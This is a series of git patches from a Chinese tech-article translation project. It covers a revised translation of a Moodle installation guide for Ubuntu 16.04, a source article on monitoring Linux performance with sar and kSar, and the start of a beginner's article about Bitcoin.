apt-get install php7.0 libapache2-mod-php7.0 php7.0-pspell php7.0-curl php7.0-gd php7.0-intl php7.0-mysql php7.0-xml php7.0-xmlrpc php7.0-ldap php7.0-zip
```
-### 6. 安装和配置 MySQL Database Server```MySQL 数据库服务器```
+### 6、 安装和配置 MySQL 数据库服务器
+
+Moodle 将大部分数据存储在数据库中,所以我们将利用以下命令安装 MySQL 数据库服务器:
-Moodle 将大部分数据存储在数据库中,所以我们将利用以下命令安装 MySQL 数据库服务器
```
apt-get install mysql-client mysql-server
```
-安装完成后,运行`mysql_secure_installation`脚本配置 MySQL 根用户```root```密码并确保 MySQL 得以安装。
-利用根用户```root```登录到 MySQL 服务器,并为 Moodle 创建一个数据库以及能访问它的用户,以下是具体操作指令:
+
+安装完成后,运行 `mysql_secure_installation` 脚本配置 MySQL 的 `root` 密码以确保 MySQL 安全。
+
+以 `root` 用户登录到 MySQL 服务器,并为 Moodle 创建一个数据库以及能访问它的用户,以下是具体操作指令:
+
```
mysql -u root -p
mysql> CREATE DATABASE moodle;
@@ -65,28 +79,32 @@ mysql> FLUSH PRIVILEGES;
mysql> \q
```
-一定要记得将`‘PASSWORD’`替换成一个安全性高强点的密码。
+一定要记得将上述 `PASSWORD` 替换成一个安全性强的密码。
-### 7. 从 GitHub ```(是一个面向开源及私有软件项目的托管平台)``` 知识库获取 Moodle
+### 7、 从 GitHub 仓库获取 Moodle
+
+接下来,切换当前工作目录,并从 GitHub 官方仓库中复制 Moodle:
-接下来,切换到当前工作目录并从 GitHub 官方知识库(存储库)中复制 Moodle`(Git是一个开源的分布式版本控制系统,可以有效、高速的处理从很小到非常大的项目版本管理。其中要利用到命令 git。以下同)`
```
cd /var/www/html/
git clone https://github.com/moodle/moodle.git
```
-切换到`“/moodle”`目录,检查所有可用的分支
+切换到 `moodle` 目录,检查所有可用的分支:
+
```
cd moodle/
git branch -a
```
-选择最新稳定版本(目前它是 MOODLE_34_ ),运行以下命令告诉 git 哪个分支可以跟踪或使用
+选择最新稳定版本(当前是 `MOODLE_34_STABLE` ),运行以下命令告诉 git 哪个分支可以跟踪或使用:
+
```
git branch --track MOODLE_34_STABLE origin/MOODLE_34_STABLE
```
-并切换至这个特定版本
+并切换至这个特定版本:
+
```
git checkout MOODLE_34_STABLE
@@ -94,20 +112,23 @@ Switched to branch 'MOODLE_34_STABLE'
Your branch is up-to-date with 'origin/MOODLE_34_STABLE'.
```
-为存储 Moodle 数据创建目录
+为存储 Moodle 数据创建目录:
+
```
mkdir /var/moodledata
```
-正确设置其所有权和访问权限
+正确设置其所有权和访问权限:
+
```
chown -R www-data:www-data /var/www/html/moodle
chown www-data:www-data /var/moodledata
```
-### 8. 配置 Apache Web Server
+### 8、 配置 Apache Web 服务器
+
+使用以下内容为您的域名创建 Apache 虚拟主机:
-使用以下内容为您的域名创建 Apache 虚拟主机
```
nano /etc/apache2/sites-available/yourdomain.com.conf
@@ -123,10 +144,10 @@ nano /etc/apache2/sites-available/yourdomain.com.conf
ErrorLog /var/log/httpd/yourdomain.com-error_log
CustomLog /var/log/httpd/yourdomain.com-access_log common
-
```
-保存文件并启用虚拟主机
+保存文件并启用虚拟主机:
+
```
a2ensite yourdomain.com
@@ -135,25 +156,27 @@ To activate the new configuration, you need to run:
service apache2 reload
```
-最后,重启 Apache WEB 服务器,以使配置生效
+最后,重启 Apache Web 服务器,以使配置生效:
+
```
service apache2 reload
```
-### 9. 接下来按照提示完成安装
+### 9、 接下来按照提示完成安装
-现在,点击“http://yourdomain.com”`(在浏览器的地址栏里输入以上域名并访问 Apache WEB 服务器)`,按照提示完成Moodle的安装。有关如何配置和使用 Moodle 的更多信息,您可以查看其[官方文档][4]。
+现在,点击 “http://yourdomain.com”(LCTT 译注:在浏览器的地址栏里输入以上域名以访问 Apache WEB 服务器),按照提示完成 Moodle 的安装。有关如何配置和使用 Moodle 的更多信息,您可以查看其[官方文档][4]。
-如果您使用我们的[优化的 Moodle 托管主机服务][5],您不必在 Ubuntu 16.04 上安装 Moodle,在这种情况下,您只需要求我们的专业 Linux 系统管理员在 Ubuntu 16.04 上安装和配置最新版本的 Moodle。他们将提供 24×7 及时响应的服务。
+如果您使用我们的[优化的 Moodle 托管主机服务][5],您不必在 Ubuntu 16.04 上安装 Moodle,在这种情况下,您只需要求我们的专业 Linux 系统管理员在 Ubuntu 16.04 上安装和配置最新版本的 Moodle。他们将提供 24×7 及时响应的服务。(LCTT 译注:这是原文作者——一个主机托管商的广告~)
+
+**PS.** 如果你喜欢这篇关于如何在 Ubuntu 16.04 上安装 Moodle 的帖子,请在社交网络上与你的朋友分享,或者留下你的回复。谢谢。
-**PS.** 如果你喜欢这篇关于如何在 Ubuntu 16.04 上安装 Moodle 的帖子,请在社交网络上与你的朋友分享,使用左边的按钮或者留下你的回复。谢谢。
--------------------------------------------------------------------------------
via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/
作者:[RoseHosting][a]
译者:[stevenzdg988](https://github.com/stevenzdg988)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 3d8864a8a009ea35405a4ee8d875c65fb52208a0 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 7 Jan 2018 09:47:42 +0800
Subject: [PATCH 125/371] PUB:20171214 How to Install Moodle on Ubuntu 16.04.md
@stevenzdg988 https://linux.cn/article-9211-1.html
---
.../20171214 How to Install Moodle on Ubuntu 16.04.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171214 How to Install Moodle on Ubuntu 16.04.md (100%)
diff --git a/translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md b/published/20171214 How to Install Moodle on Ubuntu 16.04.md
similarity index 100%
rename from translated/tech/20171214 How to Install Moodle on Ubuntu 16.04.md
rename to published/20171214 How to Install Moodle on Ubuntu 16.04.md
From 7e1e6aee341eb90f32d63b6678b40093262cca62 Mon Sep 17 00:00:00 2001
From: datastruct
Date: Sun, 7 Jan 2018 11:24:59 +0800
Subject: [PATCH 126/371] Update 20171228 Dual Boot Ubuntu And Arch Linux.md
---
sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
index 6a9091befa..adff25c6b6 100644
--- a/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
+++ b/sources/tech/20171228 Dual Boot Ubuntu And Arch Linux.md
@@ -1,3 +1,5 @@
+Translating by stevenzdg988
+
Dual Boot Ubuntu And Arch Linux
======
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dual-boot-ubuntu-and-arch-linux_orig.jpg)
From 2039f034ccd052d47ceeae18e4f738b8ab5c02b5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:26:26 +0800
Subject: [PATCH 127/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Create?=
=?UTF-8?q?=20sar=20Graphs=20With=20kSar=20To=20Identifying=20Linux=20Bott?=
=?UTF-8?q?lenecks?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...h kSar To Identifying Linux Bottlenecks.md | 340 ++++++++++++++++++
1 file changed, 340 insertions(+)
create mode 100644 sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
diff --git a/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
new file mode 100644
index 0000000000..6548a4a036
--- /dev/null
+++ b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
@@ -0,0 +1,340 @@
+How To Create sar Graphs With kSar To Identifying Linux Bottlenecks
+======
+The sar command collects, report, or save UNIX / Linux system activity information. It will save selected counters in the operating system to the /var/log/sa/sadd file. From the collected data, you get lots of information about your server:
+
+ 1. CPU utilization
+ 2. Memory paging and its utilization
+ 3. Network I/O, and transfer statistics
+ 4. Process creation activity
+ 5. All block devices activity
+ 6. Interrupts/sec etc.
+
+
+
+The sar command output can be used for identifying server bottlenecks. However, analyzing information provided by sar can be difficult, so use kSar tool. kSar takes sar command output and plots a nice easy to understand graph over a period of time.
+
+
+## sysstat Package
+
+The sar, sa1, and sa2 commands are part of sysstat package. Collection of performance monitoring tools for Linux includes
+
+ 1. sar : Displays the data.
+ 2. sa1 and sa2: Collect and store the data for later analysis. The sa2 shell script write a daily report in the /var/log/sa directory. The sa1 shell script collect and store binary data in the system activity daily data file.
+ 3. sadc - System activity data collector. You can configure various options by modifying sa1 and sa2 scripts. They are located at the following location:
+ * /usr/lib64/sa/sa1 (64bit) or /usr/lib/sa/sa1 (32bit) - This calls sadc to log reports to/var/log/sa/sadX format.
+ * /usr/lib64/sa/sa2 (64bit) or /usr/lib/sa/sa2 (32bit) - This calls sar to log reports to /var/log/sa/sarX format.
+
+
+
+### How do I install sar on my system?
+
+Type the following [yum command][1] to install sysstat on a CentOS/RHEL based system:
+`# yum install sysstat`
+Sample outputs:
+```
+Loaded plugins: downloadonly, fastestmirror, priorities,
+ : protectbase, security
+Loading mirror speeds from cached hostfile
+ * addons: mirror.cs.vt.edu
+ * base: mirror.ash.fastserv.com
+ * epel: serverbeach1.fedoraproject.org
+ * extras: mirror.cogentco.com
+ * updates: centos.mirror.nac.net
+0 packages excluded due to repository protections
+Setting up Install Process
+Resolving Dependencies
+--> Running transaction check
+---> Package sysstat.x86_64 0:7.0.2-3.el5 set to be updated
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+====================================================================
+ Package Arch Version Repository Size
+====================================================================
+Installing:
+ sysstat x86_64 7.0.2-3.el5 base 173 k
+
+Transaction Summary
+====================================================================
+Install 1 Package(s)
+Update 0 Package(s)
+Remove 0 Package(s)
+
+Total download size: 173 k
+Is this ok [y/N]: y
+Downloading Packages:
+sysstat-7.0.2-3.el5.x86_64.rpm | 173 kB 00:00
+Running rpm_check_debug
+Running Transaction Test
+Finished Transaction Test
+Transaction Test Succeeded
+Running Transaction
+ Installing : sysstat 1/1
+
+Installed:
+ sysstat.x86_64 0:7.0.2-3.el5
+
+Complete!
+```
+
+
+### Configuration files for sysstat
+
+Edit /etc/sysconfig/sysstat file specify how long to keep log files in days, maximum is a month:
+`# vi /etc/sysconfig/sysstat`
+Sample outputs:
+```
+# keep log for 28 days
+# the default is 7
+HISTORY=28
+```
+
+Save and close the file.
+
+### Find the default cron job for sar
+
+[The default cron job is located][2] at /etc/cron.d/sysstat:
+`# cat /etc/cron.d/sysstat`
+Sample outputs:
+```
+# run system activity accounting tool every 10 minutes
+*/10 * * * * root /usr/lib64/sa/sa1 1 1
+# generate a daily summary of process accounting at 23:53
+53 23 * * * root /usr/lib64/sa/sa2 -A
+```
+
+### Tell sadc to report statistics for disks
+
+Edit the /etc/cron.d/sysstat file using a text editor such as NA command or vim command, enter:
+`# vi /etc/cron.d/sysstat`
+Update it as follows to log all disk stats (the -d option force to log stats for each block device and the -I option force report statistics for all system interrupts):
+```
+# run system activity accounting tool every 10 minutes
+*/10 * * * * root /usr/lib64/sa/sa1 -I -d 1 1
+# generate a daily summary of process accounting at 23:53
+53 23 * * * root /usr/lib64/sa/sa2 -A
+```
+
+On a CentOS/RHEL 7.x you need to pass the -S DISK option to collect data for block devices. Pass the -S XALL to collect data about:
+
+ 1. Disk
+ 2. Partition
+ 3. System interrupts
+ 4. SNMP
+ 5. IPv6
+
+
+```
+# Run system activity accounting tool every 10 minutes
+*/10 * * * * root /usr/lib64/sa/sa1 -S DISK 1 1
+# 0 * * * * root /usr/lib64/sa/sa1 600 6 &
+# Generate a daily summary of process accounting at 23:53
+53 23 * * * root /usr/lib64/sa/sa2 -A
+# Run system activity accounting tool every 10 minutes
+```
+
+Save and close the file. Turn on the service for a CentOS/RHEL version 5.x/6.x, enter:
+`# chkconfig sysstat on
+# service sysstat start`
+Sample outputs:
+```
+Calling the system activity data collector (sadc):
+```
+
+For a CentOS/RHEL 7.x, run the following commands:
+```
+# systemctl enable sysstat
+# systemctl start sysstat.service
+# systemctl status sysstat.service
+```
+Sample outputs:
+```
+● sysstat.service - Resets System Activity Logs
+ Loaded: loaded (/usr/lib/systemd/system/sysstat.service; enabled; vendor preset: enabled)
+ Active: active (exited) since Sat 2018-01-06 16:33:19 IST; 3s ago
+ Process: 28297 ExecStart=/usr/lib64/sa/sa1 --boot (code=exited, status=0/SUCCESS)
+ Main PID: 28297 (code=exited, status=0/SUCCESS)
+
+Jan 06 16:33:19 centos7-box systemd[1]: Starting Resets System Activity Logs...
+Jan 06 16:33:19 centos7-box systemd[1]: Started Resets System Activity Logs.
+```
+
+## How Do I Use sar? How do I View Stats?
+
+Use the sar command to display output the contents of selected cumulative activity counters in the operating system. In this example, sar is run to get real-time reporting from the command line about CPU utilization:
+`# sar -u 3 10`
+Sample outputs:
+```
+Linux 2.6.18-164.2.1.el5 (www-03.nixcraft.in) 12/14/2009
+
+09:49:47 PM CPU %user %nice %system %iowait %steal %idle
+09:49:50 PM all 5.66 0.00 1.22 0.04 0.00 93.08
+09:49:53 PM all 12.29 0.00 1.93 0.04 0.00 85.74
+09:49:56 PM all 9.30 0.00 1.61 0.00 0.00 89.10
+09:49:59 PM all 10.86 0.00 1.51 0.04 0.00 87.58
+09:50:02 PM all 14.21 0.00 3.27 0.04 0.00 82.47
+09:50:05 PM all 13.98 0.00 4.04 0.04 0.00 81.93
+09:50:08 PM all 6.60 6.89 1.26 0.00 0.00 85.25
+09:50:11 PM all 7.25 0.00 1.55 0.04 0.00 91.15
+09:50:14 PM all 6.61 0.00 1.09 0.00 0.00 92.31
+09:50:17 PM all 5.71 0.00 0.96 0.00 0.00 93.33
+Average: all 9.24 0.69 1.84 0.03 0.00 88.20
+```
+
+Where,
+
+ * 3 = interval
+ * 10 = count
+
+
+
+To view process creation statistics, enter:
+`# sar -c 3 10`
+To view I/O and transfer rate statistics, enter:
+`# sar -b 3 10`
+To view paging statistics, enter:
+`# sar -B 3 10`
+To view block device statistics, enter:
+`# sar -d 3 10`
+To view statistics for all interrupt statistics, enter:
+`# sar -I XALL 3 10`
+To view device specific network statistics, enter:
+```
+# sar -n DEV 3 10
+# sar -n EDEV 3 10
+```
+To view CPU specific statistics, enter:
+```
+# sar -P ALL
+# Only 1st CPU stats
+# sar -P 1 3 10
+```
+To view queue length and load averages statistics, enter:
+`# sar -q 3 10`
+To view memory and swap space utilization statistics, enter:
+```
+# sar -r 3 10
+# sar -R 3 10
+```
+To view status of inode, file and other kernel tables statistics, enter:
+`# sar -v 3 10`
+To view system switching activity statistics, enter:
+`# sar -w 3 10`
+To view swapping statistics, enter:
+`# sar -W 3 10`
+To view statistics for a given process called Apache with PID # 3256, enter:
+`# sar -x 3256 3 10`
+
+## Say Hello To kSar
+
+sar and sadf provides CLI based output. The output may confuse all new users / sys admin. So you need to use kSar which is a java application that graph your sar data. It also permit to export data to PDF/JPG/PNG/CSV. You can load data from three method : local file, local command execution, and remote command execution via SSH. kSar supports the sar output of the following OS:
+
+ 1. Solaris 8, 9 and 10
+ 2. Mac OS/X 10.4+
+ 3. Linux (Systat Version >= 5.0.5)
+ 4. AIX (4.3 & 5.3)
+ 5. HPUX 11.00+
+
+
+
+### Download And Install kSar
+
+Visit the [official][3] website and grab the latest source code. Use [wget to][4] download the source code, enter:
+`$ wget https://github.com/vlsi/ksar/releases/download/v5.2.4-snapshot-652bf16/ksar-5.2.4-SNAPSHOT-all.jar`
+
+#### How Do I Run kSar?
+
+Make sure [JAVA jdk][5] is installed and working correctly. Type the following command to start kSar, run:
+`$ java -jar ksar-5.2.4-SNAPSHOT-all.jar`
+
+![Fig.01: kSar welcome screen][6]
+Next you will see main kSar window, and menus with two panels.
+![Fig.02: kSar - the main window][7]
+The left one will have a list of graphs available depending on the data kSar has parsed. The right window will show you the graph you have selected.
+
+## How Do I Generate sar Graphs Using kSar?
+
+First, you need to grab sar command statistics from the server named server1. Type the following command to get stats, run:
+`[ **server1** ]# LC_ALL=C sar -A > /tmp/sar.data.txt`
+Next copy file to local desktop from a remote box using the scp command:
+`[ **desktop** ]$ scp user@server1.nixcraft.com:/tmp/sar.data.txt /tmp/`
+Switch to kSar Windows. Click on **Data** > **Load data from text file** > Select sar.data.txt from /tmp/ > Click the **Open** button.
+Now, the graph type tree is deployed in left pane and a graph has been selected:
+![Fig.03: Processes for server1][8]
+
+![Fig.03: Disk stats \(blok device\) stats for server1][9]![Fig.05: Memory stats for server1][10]
+
+#### Zoom in and out
+
+Using the move, you can interactively zoom onto up a part of a graph. To select a zone to zoom, click on the upper left conner and while still holding the mouse but on move to the lower-right of the zone you want to zoom. To come back to unzoomed view click and drag the mouse to any corner location except a lower-right one. You can also right click and select zoom options
+
+#### Understanding kSar Graphs And sar Data
+
+I strongly recommend reading sar and sadf command man page:
+`$ man sar
+$ man sadf`
+
+## Case Study: Identifying Linux Server CPU Bottlenecks
+
+With sar command and kSar tool, one can get the detailed snapshot of memory, CPU, and other subsystems. For example, if CPU utilization is more than 80% for a long period, a CPU bottleneck is most likely occurring. Using **sar -x ALL** you can find out CPU eating process. The output of [mpstat command][11] (part of sysstat package itself) will also help you understand the cpu utilization. You can easily analyze this information with kSar.
+
+### I Found CPU Bottlenecks…
+
+Performance tuning options for the CPU are as follows:
+
+ 1. Make sure that no unnecessary programs are running in the background. Turn off [all unnecessary services on Linux][12].
+ 2. Use [cron to schedule][13] jobs (e.g., backup) to run at off-peak hours.
+ 3. Use [top and ps command][14] to find out all non-critical background jobs / services. Make sure you lower their priority using [renice command][15].
+ 4. Use [taskset command to set a processes's][16] CPU affinity (offload cpu) i.e. bind processes to different CPUs. For example, run MySQL database on cpu #2 and Apache on cpu # 3.
+ 5. Make sure you are using latest drivers and firmware for your server.
+ 6. If possible add additional CPUs to the system.
+ 7. Use faster CPUs for a single-threaded application (e.g. Lighttpd web server app).
+ 8. Use more CPUs for a multi-threaded application (e.g. MySQL database server app).
+ 9. Use more computer nodes and set up a [load balancer][17] for a web app.
+
+
+
+## isag - Interactive System Activity Grapher (alternate tool)
+
+The isag command graphically displays the system activity data stored in a binary data file by a previous sar run. The isag command invokes sar to extract the data to be plotted. isag has limited set of options as compare to kSar.
+
+![Fig.06: isag CPU utilization graphs][18]
+
+
+### about the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][19], [Facebook][20], [Google+][21].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/identifying-linux-bottlenecks-sar-graphs-with-ksar.html
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[2]:https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
+[3]:https://github.com/vlsi/ksar
+[4]://www.cyberciti.biz/tips/linux-wget-your-ultimate-command-line-downloader.html
+[5]://www.cyberciti.biz/faq/howto-ubuntu-linux-install-configure-jdk-jre/
+[6]:https://www.cyberciti.biz/media/new/tips/2009/12/sar-welcome.png (kSar welcome screen)
+[7]:https://www.cyberciti.biz/media/new/tips/2009/12/screenshot-kSar-a-sar-grapher-01.png (kSar - the main window)
+[8]:https://www.cyberciti.biz/media/new/tips/2009/12/cpu-ksar.png (Linux kSar Processes for server1 )
+[9]:https://www.cyberciti.biz/media/new/tips/2009/12/disk-stats-ksar.png (Linux Disk I/O Stats Using kSar)
+[10]:https://www.cyberciti.biz/media/new/tips/2009/12/memory-ksar.png (Linux Memory paging and its utilization stats)
+[11]://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
+[12]://www.cyberciti.biz/faq/check-running-services-in-rhel-redhat-fedora-centoslinux/
+[13]://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
+[14]://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
+[15]://www.cyberciti.biz/faq/howto-change-unix-linux-process-priority/
+[16]://www.cyberciti.biz/faq/taskset-cpu-affinity-command/
+[17]://www.cyberciti.biz/tips/load-balancer-open-source-software.html
+[18]:https://www.cyberciti.biz/media/new/tips/2009/12/isag.cpu_.png (Fig.06: isag CPU utilization graphs)
+[19]:https://twitter.com/nixcraft
+[20]:https://facebook.com/nixcraft
+[21]:https://plus.google.com/+CybercitiBiz
From a07efa1781ba2061f4e462ac4b632dc05128fa04 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:27:31 +0800
Subject: [PATCH 128/371] add done: 20091215 How To Create sar Graphs With kSar
To Identifying Linux Bottlenecks.md
---
...h kSar To Identifying Linux Bottlenecks.md | 20 +++++++++----------
1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
index 6548a4a036..0a35ec755d 100644
--- a/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
+++ b/sources/tech/20091215 How To Create sar Graphs With kSar To Identifying Linux Bottlenecks.md
@@ -317,23 +317,23 @@ via: https://www.cyberciti.biz/tips/identifying-linux-bottlenecks-sar-graphs-wit
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
-[1]://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[1]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
[2]:https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
[3]:https://github.com/vlsi/ksar
-[4]://www.cyberciti.biz/tips/linux-wget-your-ultimate-command-line-downloader.html
-[5]://www.cyberciti.biz/faq/howto-ubuntu-linux-install-configure-jdk-jre/
+[4]:https://www.cyberciti.biz/tips/linux-wget-your-ultimate-command-line-downloader.html
+[5]:https://www.cyberciti.biz/faq/howto-ubuntu-linux-install-configure-jdk-jre/
[6]:https://www.cyberciti.biz/media/new/tips/2009/12/sar-welcome.png (kSar welcome screen)
[7]:https://www.cyberciti.biz/media/new/tips/2009/12/screenshot-kSar-a-sar-grapher-01.png (kSar - the main window)
[8]:https://www.cyberciti.biz/media/new/tips/2009/12/cpu-ksar.png (Linux kSar Processes for server1 )
[9]:https://www.cyberciti.biz/media/new/tips/2009/12/disk-stats-ksar.png (Linux Disk I/O Stats Using kSar)
[10]:https://www.cyberciti.biz/media/new/tips/2009/12/memory-ksar.png (Linux Memory paging and its utilization stats)
-[11]://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
-[12]://www.cyberciti.biz/faq/check-running-services-in-rhel-redhat-fedora-centoslinux/
-[13]://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
-[14]://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
-[15]://www.cyberciti.biz/faq/howto-change-unix-linux-process-priority/
-[16]://www.cyberciti.biz/faq/taskset-cpu-affinity-command/
-[17]://www.cyberciti.biz/tips/load-balancer-open-source-software.html
+[11]:https://www.cyberciti.biz/tips/how-do-i-find-out-linux-cpu-utilization.html
+[12]:https://www.cyberciti.biz/faq/check-running-services-in-rhel-redhat-fedora-centoslinux/
+[13]:https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
+[14]:https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
+[15]:https://www.cyberciti.biz/faq/howto-change-unix-linux-process-priority/
+[16]:https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/
+[17]:https://www.cyberciti.biz/tips/load-balancer-open-source-software.html
[18]:https://www.cyberciti.biz/media/new/tips/2009/12/isag.cpu_.png (Fig.06: isag CPU utilization graphs)
[19]:https://twitter.com/nixcraft
[20]:https://facebook.com/nixcraft
From 182c488f224d5560d3a40e3d971735fbf8e8494e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 7 Jan 2018 12:39:01 +0800
Subject: [PATCH 129/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20Are=20Bitc?=
=?UTF-8?q?oins=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170919 What Are Bitcoins.md | 134 +++++++++++++++++++++
1 file changed, 134 insertions(+)
create mode 100644 sources/tech/20170919 What Are Bitcoins.md
diff --git a/sources/tech/20170919 What Are Bitcoins.md b/sources/tech/20170919 What Are Bitcoins.md
new file mode 100644
index 0000000000..3bc805e198
--- /dev/null
+++ b/sources/tech/20170919 What Are Bitcoins.md
@@ -0,0 +1,134 @@
+What Are Bitcoins?
+======
+![what are bitcoins](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-bitcoins_orig.jpg)
+
+ **[Bitcoin][1]** is a digital currency or electronic cash the relies on peer to peer technology for completing transactions. Since peer to peer technology is used as the major network, bitcoins provide a community like managed economy. This is to mean, bitcoins eliminate the centralized authority way of managing currency and promotes community management of currency. Most Also of the software related to bitcoin mining and managing of bitcoin digital cash is open source.
+
+The first Bitcoin software was developed by Satoshi Nakamoto and it's based on open source cryptographic protocol. Bitcoins smallest unit is known as the Satoshi which is basically one-hundredth millionth of a single bitcoin (0.00000001 BTC).
+
+One cannot underestimate the boundaries BITCOINS eliminate in the digital economy. For instance, the BITCOIN eliminates governed controls over currency by a centralised agency and offers control and management to the community as a whole. Furthermore, the fact that the BITCOIN is based on an open source cryptographic protocol makes it an open place where there are scrupulous activities such as fluctuating value, deflation and inflation among others. While many internet users are becoming aware of the privacy they should exercise to complete some online transactions, bitcoin is gaining more popularity than ever before. However, for those who know about the dark web and how it works can acknowledge that some people began using it long ago.
+
+On the downside, the bitcoin is also very secure in making anonymous payments which may be a threat to security or personal health. For instance, the dark web markets are the major suppliers and retailers of imported drugs and even weapons. The use of BITCOINs in the dark web facilitates a safe network for such criminal activities. Despite that, if put to good use, bitcoin has many benefits that can eliminate some of the economic fallacy as a result of centralized agency management of currency. In addition, the bitcoin allows for instance exchange of cash anywhere in the world. The use of bitcoins also mitigates counterfeiting, printing, or devaluation over time. Also, while relying on peer to peer network as its backbone, it promotes the distributed authority of transaction records making it safe to make exchanges.
+
+Other advantages of the bitcoin include;
+
+* In the online business world, bitcoin promotes money security and total control. This is because buyers are protected against merchants who may want to charge extra for a lower cost service. The buyer can also choose not to share personal information after making a transaction. Besides, identity theft protection is achieved as a result of backed up hiding personal information.
+
+* Bitcoins are provided alternatives to major common currency catastrophes such as getting lost, frozen or damaged. However, it is recommended to always make a backup of your bitcoins and encrypt them with a password.
+
+* In making online purchases and payments using bitcoins, there is a small fee or zero transaction fee charged. This promotes affordability of use.
+
+* Merchants also face fewer risks that could result from fraud as bitcoin transactions cannot be reversed, unlike other currencies in electronic form. Bitcoins also prove useful even in moments of high crime rate and fraud since it is difficult to con someone over an open public ledger (Blockchain).
+
+* Bitcoin currency is also hard to be manipulated as it is open source and the cryptographic protocol is very secure.
+
+* Transactions can also be verified and approved, anywhere, anytime. This is the level of flexibility offered by this digital currency.
+
+Also Read - [Bitkey A Linux Distribution Dedicated To Bitcoin Transactions][2]
+
+### How To Mine Bitcoins and The Applications to Accomplish Necessary Bitcoin Management Tasks
+
+In the digital currency, BITCOIN mining and management requires additional software. There are numerous open source bitcoin management software that make it easy to make payments, receive payments, encrypt and backup of your bitcoins and also bitcoin mining software. There are sites such as;
+
+[Freebitcoin][4]
+
+where one earns free bitcoins by viewing ads,
+
+[MoonBitcoin][5]
+
+is another site that one can sign up for free and earn bitcoins. However, it is convenient if one has spare time and a sizable network of friends participating in the same. There are many sites offering bitcoin mining and one can easily sign up and start mining. One of the major secrets is referring as many people as you can to create a large network.
+
+Applications required for use with bitcoins include the bitcoin wallet which allows one to safely keep bitcoins. This is just like the physical wallet using to keep hard cash but in a digital form. The wallet can be downloaded here -
+
+[Bitcoin - Wallet][6]
+
+. Other similar applications include; the
+
+[Blockchain][7]
+
+which works similar to the Bitcoin Wallet.
+
+The screenshots below show the Freebitco and MoonBitco mining sites respectively.
+
+ [![freebitco bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/freebitco-bitcoin-mining-site_orig.jpg)][8] [![moonbitcoin bitcoin mining site](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/moonbitcoin-bitcoin-mining-site_orig.png)][9]
+
+There are various ways of acquiring the bitcoin currency. Some of them include the use of bitcoin mining rigs, purchasing of bitcoins in exchange markets and doing free bitcoin mining online. Purchasing of bitcoins can be done at;
+
+[MtGox][10]
+
+,
+
+[bitNZ][11]
+
+,
+
+[Bitstamp][12]
+
+,
+
+[BTC-E][13]
+
+,
+
+[VertEx][14]
+
+, etc.. Several mining open source applications are available online. These applications include; Bitminter,
+
+[5OMiner][15]
+
+,
+
+[BFG Miner][16]
+
